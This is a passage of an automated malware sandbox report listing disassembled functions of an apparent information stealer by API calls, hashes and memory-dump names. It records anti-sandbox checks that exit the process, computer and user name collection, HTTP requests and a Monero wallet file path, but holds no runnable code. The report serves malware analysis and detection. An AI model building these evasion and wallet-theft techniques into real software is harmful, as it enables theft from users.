                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: e218fc99b08e7b8dd0fb7c75b8ec06abb8128c9572ada38fe7078c1c2a5bc1d1
                                    • Instruction ID: d23b7f9570b695d01accb0d189d475de42e9fbe1c56f448f9c81506c471eb7e4
                                    • Opcode Fuzzy Hash: e218fc99b08e7b8dd0fb7c75b8ec06abb8128c9572ada38fe7078c1c2a5bc1d1
                                    • Instruction Fuzzy Hash: F0312D70A00248AEDB05F7F2ED56BEE7778AF19341F014529F212B6193DF706A05CAB6
                                    Function 000D1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 d1220-d1247 call e89b0 GlobalMemoryStatusEx 1439 d1249-d1271 call eda00 * 2 1436->1439 1440 d1273-d127a 1436->1440 1442 d1281-d1285 1439->1442 1440->1442 1443 d129a-d129d 1442->1443 1444 d1287 1442->1444 1446 d1289-d1290 1444->1446 1447 d1292-d1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                                    • __aulldiv.LIBCMT ref: 000D1258
                                    • __aulldiv.LIBCMT ref: 000D1266
                                    • ExitProcess.KERNEL32 ref: 000D1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: e1936e26a24d77d172f99f00ad1bc753e573ab1daf4f724022adbc94608df616
                                    • Instruction ID: e5eb1355b65f8f9b9b04c44ac75de2183adcc4367bc883e7855f576dbc06e75b
                                    • Opcode Fuzzy Hash: e1936e26a24d77d172f99f00ad1bc753e573ab1daf4f724022adbc94608df616
                                    • Instruction Fuzzy Hash: 460162B0D40348BEDB10DBD0CC49BEDB778EB04701F248055E705B62C1DB7556418B69
                                    Function 000E6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 e6af3 1451 e6b0a 1450->1451 1453 e6b0c-e6b22 call e6920 call e5b10 CloseHandle ExitProcess 1451->1453 1454 e6aba-e6ad7 call eaad0 OpenEventA 1451->1454 1460 e6ad9-e6af1 call eaad0 CreateEventA 1454->1460 1461 e6af5-e6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000E6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 000E6AF9
                                    • Sleep.KERNEL32(00001770), ref: 000E6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00B791D8,?,000F110C,?,00000000,?,000F1110,?,00000000,000F0AEF), ref: 000E6B1A
                                    • ExitProcess.KERNEL32 ref: 000E6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 8ab863bd307f83853906e0f4a45f4318cc96c96fc5c6feba370ba8f0fc6644cf
                                    • Instruction ID: 862da040cc6acc8b530bc1f32f4ccb6ee72f1e9afd79a9b0994d9366cefec35e
                                    • Opcode Fuzzy Hash: 8ab863bd307f83853906e0f4a45f4318cc96c96fc5c6feba370ba8f0fc6644cf
                                    • Instruction Fuzzy Hash: 29F05430A40249EFE751ABA1EC16BFE7B78FB18742F148924B512B11D2CBB15540DA57
                                    Function 000D47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: c2186418d929517f8c3001888a6fb6a06730f077e76cbb32f8855fd0f768bbd8
                                    • Instruction ID: 5755f326f3caf1c98facfdc01bf98bf44f4194b2ea0815953479cb038688bae9
                                    • Opcode Fuzzy Hash: c2186418d929517f8c3001888a6fb6a06730f077e76cbb32f8855fd0f768bbd8
                                    • Instruction Fuzzy Hash: 21214DB1D00209ABDF14DFA5E845AEE7B79FB45320F108625F925B72C1EB706A09CF91
                                    Function 000E51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D6280: InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                      • Part of subcall function 000D6280: StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                      • Part of subcall function 000D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                      • Part of subcall function 000D6280: HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                      • Part of subcall function 000D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                      • Part of subcall function 000D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: d586ca3f3841e47ed52d517a0d27169c3880c0ac788b74b1c9dc8d6ebeffb908
                                    • Instruction ID: f058c2808098ece027fb976559ae4d0b2e7e1313dd265eef8bdee8f7299bfff3
                                    • Opcode Fuzzy Hash: d586ca3f3841e47ed52d517a0d27169c3880c0ac788b74b1c9dc8d6ebeffb908
                                    • Instruction Fuzzy Hash: AF117330A00188AFDB14FF61DD92AEC3339AF59300F404528F91A6B593EF70BB09C692
                                    Function 000E78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 5e9a9348fb91cab345ac215f798c4746441a1eed2348feb5c2d6b5cb28cdf0c6
                                    • Instruction ID: 72e3fc7b9a2ffcf6cb6b4879cbd582f467be2fa831f3914b396e3dbacc61d01d
                                    • Opcode Fuzzy Hash: 5e9a9348fb91cab345ac215f798c4746441a1eed2348feb5c2d6b5cb28cdf0c6
                                    • Instruction Fuzzy Hash: 3F0181B1A04648EFC710DF99DD45BAEBBBCFB08B21F10425AFA45F3280D37459008BA2
                                    Function 000D1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                                    • ExitProcess.KERNEL32 ref: 000D1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: f243118ffa3d5c16cb68c3e53295195df8420741109ae2962d8fc3d63b3d9b74
                                    • Instruction ID: 50d98dde818e9517f180fe0bb373962145c70e576c0c4c90d23dca03d3911347
                                    • Opcode Fuzzy Hash: f243118ffa3d5c16cb68c3e53295195df8420741109ae2962d8fc3d63b3d9b74
                                    • Instruction Fuzzy Hash: 83E0E670946308FBE7516BE09C0AB997ABCAB08B12F108055F709762D0DAB526419699
                                    Function 000D10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000D10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000D10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 754fd455b83e3da3bb51a9859118afa19f5977fc262f13cf3a0681f745ab7e79
                                    • Instruction ID: efa9270ee5b0e17659602d8281f9f7672b383f71b0b7c18b6d0470f9c9643740
                                    • Opcode Fuzzy Hash: 754fd455b83e3da3bb51a9859118afa19f5977fc262f13cf3a0681f745ab7e79
                                    • Instruction Fuzzy Hash: 04F0E2B1641308BBE714AAA4AC49FEABBECE709B15F304449F504E3280D9719F00CAA0
                                    Function 000D1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000E78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7910
                                      • Part of subcall function 000E78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7917
                                      • Part of subcall function 000E78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000E792F
                                      • Part of subcall function 000E7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                      • Part of subcall function 000E7850: RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                      • Part of subcall function 000E7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                    • ExitProcess.KERNEL32 ref: 000D11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: ff110d53ab24f64f0bc335539e27bc6ea18f313a2326fd595017c962e2322700
                                    • Instruction ID: f006f4bb02d1d48867624b5d3840dad4b8b1e5c2b42cf7013fe5578d3aeb8e37
                                    • Opcode Fuzzy Hash: ff110d53ab24f64f0bc335539e27bc6ea18f313a2326fd595017c962e2322700
                                    • Instruction Fuzzy Hash: EEE012B59543416BDA0173B2BD0ABEA329D5B58346F084425FA0DE2243FE25E90086B6

                                    Non-executed Functions

                                    Function 000E38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000E38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000E38E3
                                    • lstrcat.KERNEL32(?,?), ref: 000E3935
                                    • StrCmpCA.SHLWAPI(?,000F0F70), ref: 000E3947
                                    • StrCmpCA.SHLWAPI(?,000F0F74), ref: 000E395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000E3C67
                                    • FindClose.KERNEL32(000000FF), ref: 000E3C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 8bd58f9f1265c50974e80a1ff51cdf1b8a5ec9838441c5296a2157b2200f03f3
                                    • Instruction ID: 2058ae3909816484c4836b80336f5cab61942bbff664657c9a4831b578a9c45d
                                    • Opcode Fuzzy Hash: 8bd58f9f1265c50974e80a1ff51cdf1b8a5ec9838441c5296a2157b2200f03f3
                                    • Instruction Fuzzy Hash: AEA152B1900248AFDB25DFA5DC89FFE777CBB48301F048598A60DA6142DB759B84CF62
                                    Function 000DBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,000F0B32,000F0B2B,00000000,?,?,?,000F13F4,000F0B2A), ref: 000DBEF5
                                    • StrCmpCA.SHLWAPI(?,000F13F8), ref: 000DBF4D
                                    • StrCmpCA.SHLWAPI(?,000F13FC), ref: 000DBF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 000DC7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
